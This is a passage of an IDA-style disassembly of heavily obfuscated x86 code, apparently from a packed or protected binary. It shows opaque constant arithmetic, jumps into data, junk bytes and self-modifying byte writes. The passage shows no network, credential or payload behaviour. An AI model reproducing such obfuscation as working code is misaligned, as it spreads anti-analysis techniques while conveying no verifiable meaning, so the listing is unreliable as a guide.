; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------

loc_48C461:				; CODE XREF: _3gijy9nr:0048D2D9j
		xchg	edx, [esp]
		pop	edx
		push	48ABCDh
		jmp	loc_48A26B
; ---------------------------------------------------------------------------
		align 10h
		dd 8A2CD581h, 0F9E92847h, 0FFFFE5h, 5DF6A468h, 0E3815B1Ah
		dd 4D5199E3h, 6A2CEB81h, 1BE965BEh, 2, 0D7E9F53Bh, 0FFFFE9h
		dd 8CAC100h, 7581EF81h,	4BE9D778h, 19h

; =============== S U B	R O U T	I N E =======================================



sub_48C4AC	proc near		; CODE XREF: sub_48B609-21CBp
					; _3gijy9nr:0048D6FFj
		xchg	eax, [esp+0]
		xchg	ecx, [esp+0]
		mov	eax, ecx
		pop	ecx
		add	eax, ebp
		call	near ptr sub_48CD0A
		add	[ebx+0F001078h], al ; CODE XREF: sub_48B609:loc_48D8DFj
		test	bh, dl
		sldt	word ptr [eax]
		push	488814h
		jmp	nullsub_546
sub_48C4AC	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		align 2
		dw 1C6h
		dd 0C0815987h, 0F3FFBEFDh, 0E9240420h, 0FFFFE78Dh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48D1F6

loc_48C4E4:				; CODE XREF: sub_48B609+12CBj
					; sub_48D1F6+4j
		push	edx
		mov	edx, 4889BEh
		jmp	loc_48B07E
; END OF FUNCTION CHUNK	FOR sub_48D1F6
; ---------------------------------------------------------------------------
byte_48C4EF	db 56h			; DATA XREF: _3gijy9nr:0048978Ao
		dd 75855968h, 0E6815E26h, 0CA6151C9h, 0FFC449E8h, 1066E9FFh
		db 3 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48C507:				; CODE XREF: sub_48B609-115Aj
		jz	near ptr byte_489583

loc_48C50D:				; CODE XREF: _3gijy9nr:0048D12Cj
		jmp	locret_48BFA9
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		dw 0C100h
		dd 830F05E5h, 0FFFFFE24h, 5EE9E903h, 0FFFFD0h, 0AEE95200h
		dd 8
		db 0
; ---------------------------------------------------------------------------

loc_48C52D:				; CODE XREF: _3gijy9nr:loc_48911Cj
		call	sub_48A74C
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48C532:				; CODE XREF: sub_48B609+843j
		jmp	loc_48C554
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		align 4
		dd 0F9AEE900h, 8700FFFFh, 0E85B241Ch, 8A5h
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48CCF3

loc_48C549:				; CODE XREF: sub_48CCF3+6j
		jmp	loc_48CB63
; END OF FUNCTION CHUNK	FOR sub_48CCF3
; ---------------------------------------------------------------------------
		jmp	loc_48A8C6
; ---------------------------------------------------------------------------
		align 4
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48C554:				; CODE XREF: sub_48B609:loc_48C532j
		add	edx, 0CAC53A95h
		mov	[edx], eax
		pop	edx
		push	0B7E6E58Eh
		jmp	loc_48A68A
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		align 4
		sbb	ebx, 3AB1FF67h
		jmp	sub_488E43
; ---------------------------------------------------------------------------
		align 4
		pushf
		jmp	sub_48DD48
; ---------------------------------------------------------------------------
		align 4
		retn
; ---------------------------------------------------------------------------
		align 2
; START	OF FUNCTION CHUNK FOR sub_48A8B8

loc_48C57E:				; CODE XREF: sub_48A8B8+9j
		jmp	locret_48BA04
; END OF FUNCTION CHUNK	FOR sub_48A8B8
; ---------------------------------------------------------------------------
		align 4
		dd 0D0C015FFh, 75FF0045h, 0C015FFFCh, 680045D0h, 48CEE6h
		dd 0FFEC02E9h, 810000FFh, 0ECCCDCF0h, 0F5BA52DAh, 0E90048D3h
		dd 0FFFFF67Bh
; ---------------------------------------------------------------------------

loc_48C5B0:				; CODE XREF: _3gijy9nr:00489C77j
		push	0C553F730h
		pop	eax
		add	eax, 2B54DC57h
		and	eax, 44479566h
		xor	eax, 1AD3EE04h
		rol	eax, 7
		add	eax, 96892C3Fh
		jmp	loc_48DB1B
; ---------------------------------------------------------------------------

locret_48C5D6:				; CODE XREF: _3gijy9nr:0048B41Cj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48C5D7:				; CODE XREF: sub_48B609+1F2j
		jmp	loc_48AF3B
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		dd 78E90000h, 0FFFFECh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_488830

loc_48C5E4:				; CODE XREF: sub_488830:loc_489DFBj
		pop	ebp
		push	offset loc_489114
		jmp	nullsub_583
; END OF FUNCTION CHUNK	FOR sub_488830
; ---------------------------------------------------------------------------
		align 10h
		dd 5F243C87h, 6EE99C50h, 81FFFFEDh, 9CF30FF2h, 0DAB16890h
		dd 20E90048h, 0FFFFFAh,	0E9F18500h, 197h, 0C28B138Bh, 502E9h
		dd 0E8000000h, 0FFFFF7AAh, 6EE91089h, 0FFFFDAh,	0D3BE99Dh
		dd 0DA870000h, 455E9h
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48C63A:				; CODE XREF: _3gijy9nr:004898A7j
		adc	ebp, eax
		or	ebp, ebx
		ror	ecx, 5
		test	ebx, ebp
		jz	near ptr dword_488E8C+9
		rol	esi, 12h
		and	esi, 82E26F3Fh
		add	esi, 0FE2884BCh
		jmp	near ptr dword_48963C+12h
; ---------------------------------------------------------------------------
		align 2

loc_48C65E:				; CODE XREF: _3gijy9nr:0048D0AFj
		pop	eax
		rol	eax, 8
		sub	eax, 0B37E7B84h
		add	eax, 473ABC65h
		xchg	eax, [esp]
		push	offset byte_48B94F
		jmp	locret_48AB1F
; ---------------------------------------------------------------------------
		align 4
		db 0

; =============== S U B	R O U T	I N E =======================================



sub_48C67D	proc near		; CODE XREF: sub_48B609+5B5j
					; sub_48A343+2A04p

; FUNCTION CHUNK AT 0048ACD6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048B408 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0048B414 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048C68E SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0048CC4D SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0048D819 SIZE 00000018 BYTES

		xchg	edi, [esp+0]
		xchg	ecx, [esp+0]
		mov	edi, ecx
		pop	ecx
		pop	ebx
		jmp	loc_48CC4D
sub_48C67D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48C67D

loc_48C68E:				; CODE XREF: _3gijy9nr:004898CCj
					; sub_48C67D:loc_48B408j
		push	offset sub_48ADD6
		jmp	loc_48ACD6
; END OF FUNCTION CHUNK	FOR sub_48C67D
; ---------------------------------------------------------------------------
		dd 0CA8B0000h, 0FFF10BE9h, 810000FFh, 0E0D9EDE8h, 0F936E98Ch
		dd 0C381FFFFh, 369A9776h, 8108C3C1h, 8AD616C3h,	0FA28E9D2h
		dd 8100FFFFh, 75983BC0h, 0D311E959h, 8100FFFFh,	802304C0h
; ---------------------------------------------------------------------------
		inc	eax
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48C6D5:				; CODE XREF: sub_48B609:loc_489EF8j
		call	loc_48B765

loc_48C6DA:				; CODE XREF: sub_48A3DD+10j
		jmp	loc_48D2F2
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
byte_48C6DF	db 8Bh			; DATA XREF: _3gijy9nr:0048DD3Eo
		dd 243C87FEh, 0D490800Fh, 0E951FFFFh, 0FFFFC550h
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48C6F1:				; CODE XREF: sub_48B609-339j
		add	ebx, 5AAACF7h
		jmp	loc_488DA3
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		dd 0A0BE8h
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48C702:				; CODE XREF: _3gijy9nr:0048C34Cj
		jmp	loc_4897E6
; ---------------------------------------------------------------------------
		align 4
		dd 7B336BBBh, 0E92A8BF7h, 0FFFFEACCh
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48C716:				; CODE XREF: _3gijy9nr:004892ACj
		jp	loc_489428
		and	eax, edi
		jmp	sub_48A770
; ---------------------------------------------------------------------------
		align 4
		dd 0C2C15A00h, 7DEA8109h, 8199263Ch, 5E60EBC2h,	5AC2034Ah
		dd 48DD6768h, 0F3C7E900h
		db 2 dup(0FFh),	0
; ---------------------------------------------------------------------------

loc_48C743:				; CODE XREF: _3gijy9nr:0048D580j
		mov	byte ptr [eax],	87h
		pop	eax
		push	esi
		push	4EDD2840h
		pop	esi
		jmp	loc_48BFC3
; ---------------------------------------------------------------------------
		align 4
		dd 9ABB5357h, 0E90048C7h, 0FFFFC9CEh
		db 2 dup(0)
; ---------------------------------------------------------------------------

locret_48C762:				; CODE XREF: _3gijy9nr:004894EBj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48C763:				; CODE XREF: sub_48B609+17C9j
		sub	ebx, 4367949Ch
		add	ebx, 1DEFFA4Dh
		jnz	loc_48AA0B
		sbb	edx, 0B3BB901Dh
		jmp	loc_48AA03
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
dword_48C780	dd 586400C6h, 35FF64h, 64000000h, 2589h, 72E80000h, 9DFFFFD3h
					; DATA XREF: sub_48A3CF+4o
		dd 68510972h, 9D9043EAh, 8B240C87h, 0F0E959D1h,	0FFFFFC1h
		dd 0FFF4C287h
		db 0FFh

; =============== S U B	R O U T	I N E =======================================



sub_48C7B1	proc near		; CODE XREF: _3gijy9nr:0048D427p
		xchg	edi, [esp+0]
		xchg	eax, [esp+0]
		mov	edi, eax
		jmp	loc_48BFDF
sub_48C7B1	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_48C7C0	proc near		; CODE XREF: _3gijy9nr:0048A615p
					; _3gijy9nr:0048AD04j

; FUNCTION CHUNK AT 0048B501 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	esi
		push	48967Eh
		jmp	loc_48B501
sub_48C7C0	endp

; ---------------------------------------------------------------------------
		align 10h
		db 0
; ---------------------------------------------------------------------------

loc_48C7D1:				; CODE XREF: _3gijy9nr:004895F8j
		mov	byte ptr [esi],	3
		pop	esi
		call	loc_48D5CF
; ---------------------------------------------------------------------------
		dw 0
; ---------------------------------------------------------------------------

loc_48C7DC:				; CODE XREF: _3gijy9nr:0048D0F0j
		jmp	loc_48A724
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_488F35

loc_48C7E1:				; CODE XREF: sub_488F35+7j
		jmp	loc_489573
; END OF FUNCTION CHUNK	FOR sub_488F35
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48C7E7:				; CODE XREF: sub_48B609+28CFj
		xor	edi, 0D488F754h
		cmp	edi, 85A6C49Bh
		jmp	loc_489FAC
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		push	offset sub_48A1A5
		jmp	locret_48A50E
; ---------------------------------------------------------------------------
		align 4

loc_48C804:				; CODE XREF: _3gijy9nr:00489FC6j
		jg	loc_48D4B1
		mov	[ebp+0], edi
		jmp	loc_48C251
; ---------------------------------------------------------------------------
		dw 0C300h
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48C815:				; CODE XREF: sub_48B609+4FAj
		jmp	near ptr dword_48B2EC+14h
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		align 4
		add	edi, 0FD03368h
		ror	eax, 0Bh
		jmp	sub_488F35
; ---------------------------------------------------------------------------
		db 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_557. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_48C82C:				; CODE XREF: _3gijy9nr:0048AA24j
		pop	eax
		pop	ebp
		or	eax, 0C3C973C8h
		and	eax, 4B0FD564h
		jmp	near ptr dword_4895A0+0Bh
; ---------------------------------------------------------------------------
		align 10h
		mov	byte ptr [ecx],	87h
		pop	ecx
		and	eax, 0F222EEDDh
		jns	loc_48BE87

loc_48C850:				; CODE XREF: _3gijy9nr:0048DD43j
		jmp	locret_48D738
; ---------------------------------------------------------------------------
		align 2
		add	edi, 0C89641BDh
		jmp	loc_48D287
; ---------------------------------------------------------------------------
		align 2

loc_48C862:				; CODE XREF: _3gijy9nr:00489890j
		jno	loc_48CB0D
		xchg	edi, [esp]
		pop	edi
		mov	byte ptr [esi],	87h
		jmp	near ptr dword_488E8C+1Bh
; ---------------------------------------------------------------------------

loc_48C874:				; CODE XREF: _3gijy9nr:loc_48CF11j
		push	edx
		push	55DF5BD0h
		pop	edx
		sub	edx, 0EC6247CBh
		or	edx, 3F2DAE45h
		cmp	edx, 0FC80A876h
		jmp	loc_48B740
; ---------------------------------------------------------------------------
		dw 810Fh
		dd 0FFFFDA51h, 87D78B52h, 66BF2414h, 0E900488Bh, 0FFFFBF2Eh
; ---------------------------------------------------------------------------

loc_48C8A8:				; DATA XREF: _3gijy9nr:0048AE4Ao
		mov	byte ptr [edx],	87h
		pop	edx
		xchg	eax, [esp]
		mov	ebp, eax
		pop	eax
		ficomp	dword ptr [esp]
		mov	esi, ebx
		xchg	ebp, [esp]
		jmp	loc_488BF4
; ---------------------------------------------------------------------------
		align 10h
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48C8C1:				; CODE XREF: sub_48B609:loc_48DA4Fj
		mov	byte ptr [esi],	0C6h
		pop	esi
		call	sub_48C98D
		add	bl, al
		add	ah, bh
		jno	loc_48972E
		jb	loc_48C4E4
		lodsb
		add	edx, eax
		push	ebx
		jmp	near ptr dword_48AC24+1
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48D4C3

loc_48C8E3:				; CODE XREF: sub_48D4C3+15j
		call	sub_489C99

loc_48C8E8:				; CODE XREF: _3gijy9nr:0048B23Ej
		jo	loc_489407
; END OF FUNCTION CHUNK	FOR sub_48D4C3

; =============== S U B	R O U T	I N E =======================================



sub_48C8EE	proc near		; CODE XREF: sub_48C67D+119Fp

arg_0		= dword	ptr  4

		xchg	ecx, [esp+0]
		pop	ecx
		xchg	edi, [esp-4+arg_0]
		push	offset dword_48D498
		jmp	nullsub_560
sub_48C8EE	endp

; ---------------------------------------------------------------------------
		align 10h
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48C901:				; CODE XREF: sub_48B609:loc_48DE35j
		mov	byte ptr [edx],	0Fh
		pop	edx
		push	esi
		push	2073198Bh
		pop	esi
		or	esi, 740611B3h
		jmp	loc_48B270
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		align 4
		dd 1C87FB87h, 0C2815B24h, 6C4A7FB6h, 9F9E8h, 14870000h
		dd 70A95A24h, 0F000000h, 0FFCFF984h, 0DB2BE9FFh
		db 2 dup(0FFh),	0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_576. PRESS KEYPAD	"+" TO EXPAND]
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48C941:				; CODE XREF: sub_48B609-1B23j
		jmp	loc_48B746
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

locret_48C947:				; CODE XREF: _3gijy9nr:0048A664j
		retn
; ---------------------------------------------------------------------------
		dd 6F35F068h, 0C0C1588Eh, 99E8811Ah, 8198F1DEh,	0BE14C0h
		dd 4879DD7h, 0D63FE924h, 0FFFFh, 0DCB16856h, 815EF620h
		dd 0EEF845F6h, 0DFBBE924h, 0F00FFFFh, 0E9885h, 0FAEAE900h
		dd 0FA23FFFFh, 0FFF95FE9h
		db 0FFh

; =============== S U B	R O U T	I N E =======================================



sub_48C98D	proc near		; CODE XREF: sub_48B609+12BCp
		xchg	edx, [esp+0]
		pop	edx
		lea	eax, locret_48B8B7

loc_48C997:				; DATA XREF: sub_48B609+2AFo
		mov	byte ptr [eax],	0C3h
		jmp	near ptr dword_488E8C+5Dh
sub_48C98D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_48C9A0	proc near		; CODE XREF: _3gijy9nr:0048ABC6j

; FUNCTION CHUNK AT 00488AF4 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0048D8C0 SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		push	eax
		mov	eax, offset nullsub_582
		jmp	loc_48D8C0
sub_48C9A0	endp

; ---------------------------------------------------------------------------
		align 10h
		db 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_552. PRESS KEYPAD	"+" TO EXPAND]
		align 4
		retn
; ---------------------------------------------------------------------------

loc_48C9B5:				; CODE XREF: _3gijy9nr:loc_48DCF6j
		and	ebx, 0B682BB60h
		sub	ebx, 78E41BDFh
		add	ebx, 66C8812Ah
		add	ebx, ecx
		jmp	loc_48C229
; ---------------------------------------------------------------------------
		push	ecx
		cdq
		jmp	loc_48AA1C
; ---------------------------------------------------------------------------
		db 2 dup(0), 87h
		dd 0C6582404h, 35FFF07h, 0E2FDE8F5h, 39E9FFFFh,	0FFFFF7h
; ---------------------------------------------------------------------------

locret_48C9EC:				; CODE XREF: _3gijy9nr:loc_48A258j
		retn
; ---------------------------------------------------------------------------
		align 2
		dw 8Bh
		dd 0FFE514E8h, 0F0000FFh, 0FFEE098Dh, 0C985E9FFh, 0FFFFh
		dd 0E0D2D0B8h, 0E9C513EBh, 0FFFFEDF1h
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48CA12:				; CODE XREF: _3gijy9nr:0048B4CCj
		call	sub_48DFC2
		mov	byte ptr ds:loc_489D70,	68h
		mov	byte ptr ds:loc_489D75,	0E9h
		mov	byte ptr ds:loc_48B782,	0E9h
		mov	byte ptr ds:nullsub_580, 0C3h
		mov	ds:byte_48CB9C,	0Fh
		mov	byte ptr ds:dword_48A7F0, 0Fh
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_554. PRESS KEYPAD	"+" TO EXPAND]
		db 0
; ---------------------------------------------------------------------------

loc_48CA43:				; CODE XREF: _3gijy9nr:0048CC41j
		push	offset loc_489A37
		jmp	near ptr dword_488798+17h
; ---------------------------------------------------------------------------
		db 2 dup(0), 87h
; ---------------------------------------------------------------------------
		adc	al, 24h
		pop	edx
		mov	ecx, offset loc_48D260
		jmp	loc_48DE8B
; ---------------------------------------------------------------------------

loc_48CA5D:				; CODE XREF: _3gijy9nr:0048A82Dj
		xchg	eax, [esp]
		pop	eax
		mov	byte ptr [ebx],	50h
		xchg	edi, [esp]
		mov	ebx, edi
		pop	edi
		mov	esi, ebp
		jmp	near ptr dword_488C00+155h
; ---------------------------------------------------------------------------
		align 2

; =============== S U B	R O U T	I N E =======================================



sub_48CA72	proc near		; CODE XREF: _3gijy9nr:loc_48A092p
					; _3gijy9nr:0048B50Cj

arg_0		= dword	ptr  4

		xchg	edi, [esp+0]
		pop	edi
		xchg	esi, [esp-4+arg_0]
		pop	esi
		jmp	loc_48B717
sub_48CA72	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		align 10h
		db 0
; ---------------------------------------------------------------------------

loc_48CA81:				; CODE XREF: _3gijy9nr:loc_48A5E8j
		jnz	near ptr dword_489974+32h
		jmp	near ptr dword_4894F0+13h
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		align 2

; =============== S U B	R O U T	I N E =======================================



sub_48CA8E	proc near		; CODE XREF: sub_489B60+15ADp
		xchg	ecx, [esp+0]
		pop	ecx
		popf
		call	sub_488E43

loc_48CA98:				; CODE XREF: sub_48A799+11j
		jmp	loc_48B935
sub_48CA8E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		align 2
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48CA9E:				; CODE XREF: sub_48B609+19D5j
		push	489B4Fh
		jmp	loc_48B8D8
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_488888

loc_48CAAA:				; CODE XREF: sub_488888+1DF4j
		mov	byte ptr [ebx],	87h
		pop	ebx
		rol	eax, 1Dh
		or	eax, 0D4B06075h
		add	eax, 2351EF27h
		call	sub_48CCF3
; END OF FUNCTION CHUNK	FOR sub_488888
; ---------------------------------------------------------------------------
		dw 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48CAC4:				; CODE XREF: sub_48B609-1469j
		jmp	loc_48AED6
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------

loc_48CAC9:				; CODE XREF: _3gijy9nr:0048DAECj
		add	ebx, 0FC7B6E5Fh
		xor	ebx, 43D9CF46h
		push	48A175h
		jmp	locret_48A886
; ---------------------------------------------------------------------------
		db 0Fh
; ---------------------------------------------------------------------------
		test	ecx, ebp
		sar	edi, 0FFh
		jmp	loc_48D338
; ---------------------------------------------------------------------------
		align 4
		add	edx, 0DB2EAA16h
		xchg	edx, [esp]
		jmp	nullsub_573
; ---------------------------------------------------------------------------
		dw 0C100h
		db 0E5h, 0Ah, 52h
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48CEEE

loc_48CAFF:				; CODE XREF: sub_48CEEE:loc_48AB31j
		call	sub_489B60
; END OF FUNCTION CHUNK	FOR sub_48CEEE
; ---------------------------------------------------------------------------
		dd 0DAE90000h, 0FFFFBCh
		db 0
; ---------------------------------------------------------------------------

loc_48CB0D:				; CODE XREF: _3gijy9nr:loc_48C862j
					; DATA XREF: _3gijy9nr:0048CD5Ao
		xchg	esi, [esp]
		jmp	near ptr dword_489124+15h
; ---------------------------------------------------------------------------
		push	offset dword_489528
		jmp	loc_489E08
; ---------------------------------------------------------------------------
		db 87h
		dd 8D59240Ch, 48CE6905h, 0C300C600h, 0FFD450E9h, 0F18100FFh
		dd 7676ADF2h, 465CFA81h, 0BBE91EBAh
		db 0Fh,	2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48CB43:				; CODE XREF: sub_48B609+60Ej
		xchg	eax, [esp+4+var_4]
		xchg	ebx, [esp+4+var_4]
		mov	eax, ebx
		pop	ebx
		push	413FBF9Ch
		pop	esi
		add	esi, 0A489C3E3h
		or	esi, 0D67448F6h
		jmp	near ptr dword_48B77C+1
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48CCF3

loc_48CB63:				; CODE XREF: sub_48CCF3:loc_48C549j
		pop	edi
		xchg	edi, [esp-4+arg_0]
		call	sub_489593
		jmp	nullsub_550
; END OF FUNCTION CHUNK	FOR sub_48CCF3
; ---------------------------------------------------------------------------
		align 2
		push	ecx
		push	451184DCh
		pop	ecx
		add	ecx, 0B1649F3Dh
		jmp	loc_48DE5E
; ---------------------------------------------------------------------------

loc_48CB84:				; CODE XREF: _3gijy9nr:00489611j
		push	0B502A879h
		pop	edi
		sub	edi, 54B888B8h
		and	edi, 0C605967Eh
		jmp	loc_48D7A9
; ---------------------------------------------------------------------------
		align 4
byte_48CB9C	db 0Fh			; DATA XREF: _3gijy9nr:loc_489D70o
					; _3gijy9nr:0048CA33w
		db 84h,	0D0h, 0FFh
		dd 0E852FFFFh, 0FFFFF15Bh, 0C1E90000h, 0FFFFF3h, 5EFF06C6h
		dd 0A053CA68h, 0C2815ABCh, 79BED1BBh, 0FFECE0E9h
		db 0FFh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48CBC5:				; CODE XREF: sub_48B609+16Ej
		push	489B32h
		jmp	near ptr dword_489AEC+39h
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		db 0E8h
		dd 0FFFFFE03h, 0E9F08700h, 0FFFFF52Dh, 6C60000h, 4CE85E9Dh
		dd 10h,	0C13CE900h
		db 2 dup(0FFh),	0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_546. PRESS KEYPAD	"+" TO EXPAND]
		dd 0
		dd 116h
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48CBF8:				; CODE XREF: sub_48B609-1ED1j
		jmp	nullsub_568
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		align 10h
		retn
; ---------------------------------------------------------------------------
		db 53h,	58h, 32h
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48D08F

loc_48CC06:				; CODE XREF: sub_48D08F+Cj
		rol	esi, 13h
		xor	esi, 5B804255h
		push	ebx
		mov	ebx, 489D01h
		jmp	near ptr byte_48A34D+2
; END OF FUNCTION CHUNK	FOR sub_48D08F
; ---------------------------------------------------------------------------
		adc	esi, eax
		shl	ebp, 8
		jmp	sub_489378
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48CC24:				; CODE XREF: sub_48B609+47Dj
		push	1A32C46Fh
		sbb	edx, ebp
		jmp	loc_48B173
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		dd 0DBFE8100h, 0E9E13CFDh, 589h
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48CC3E:				; CODE XREF: _3gijy9nr:00489278j
		xchg	ecx, [esp]
		jmp	loc_48CA43
; ---------------------------------------------------------------------------
		align 4
		mov	eax, offset off_45D15C
; START	OF FUNCTION CHUNK FOR sub_48C67D

loc_48CC4D:				; CODE XREF: sub_48C67D+Aj
		jz	loc_48B414
		jno	loc_4892F2
		mov	edx, [eax]
		or	edx, edx
		jmp	loc_48B408
; END OF FUNCTION CHUNK	FOR sub_48C67D
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48CC63:				; CODE XREF: sub_48B609:loc_48C27Dj
		mov	byte ptr [ebx],	9Ch
		pop	ebx
		xor	esi, 15942BC3h
		push	ebx
		jmp	loc_48B2BE
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		align 4
		dd 0B38F0F00h, 81000013h, 0A99C67D1h, 326E9D9h,	0
		dd 12E21068h, 0E9C51382h, 0FFFFC4FDh
		db 0
; ---------------------------------------------------------------------------

loc_48CC95:				; CODE XREF: _3gijy9nr:loc_48D7A9j
		add	edi, 0BFFFE9C1h
		test	esi, edi
		pop	edi
		jmp	loc_48989D
; ---------------------------------------------------------------------------
		align 4
		dd 0C0815F00h, 0A04E29D1h, 77E8008Bh, 0FFFFFCh,	0FFEABDE9h
		db 0FFh
; ---------------------------------------------------------------------------

loc_48CCB9:				; CODE XREF: _3gijy9nr:loc_48ABFBj
		push	edi
		call	sub_48D95C

loc_48CCBF:				; CODE XREF: _3gijy9nr:0048DD82j
		jmp	loc_48D57B
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_48CCC5:				; CODE XREF: _3gijy9nr:0048ACC5j
		jmp	loc_488B12
; ---------------------------------------------------------------------------
		align 4

locret_48CCCC:				; CODE XREF: _3gijy9nr:004897F9j
		retn
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48CCCF:				; CODE XREF: sub_48B609-BF2j
		jmp	loc_489EAB
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		dd 1C870000h, 7E95B24h,	0E9FFFFE1h, 0FFFFE08Fh
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48C3B4

loc_48CCE6:				; CODE XREF: sub_48C3B4+Aj
		call	loc_48A60A
; END OF FUNCTION CHUNK	FOR sub_48C3B4
; ---------------------------------------------------------------------------
		db 0
		dd 0EBC5E900h
		db 2 dup(0FFh),	0

; =============== S U B	R O U T	I N E =======================================



sub_48CCF3	proc near		; CODE XREF: sub_488888+4235p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0048C549 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048CB63 SIZE 0000000E BYTES

		xchg	edx, [esp-4+arg_0]
		pop	edx
		push	edi
		push	eax
		jmp	loc_48C549
sub_48CCF3	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		align 10h
		retn
; ---------------------------------------------------------------------------
		align 2

loc_48CD02:				; CODE XREF: _3gijy9nr:0048B579j
		jmp	near ptr dword_48AFB8+2
; ---------------------------------------------------------------------------
		align 4
		retn
; ---------------------------------------------------------------------------
		align 2

; =============== S U B	R O U T	I N E =======================================



sub_48CD0A	proc far		; CODE XREF: sub_48C4AC+Bp

; FUNCTION CHUNK AT 0048A32C SIZE 00000017 BYTES

		xchg	edi, [esp+0]
		xchg	eax, [esp+0]
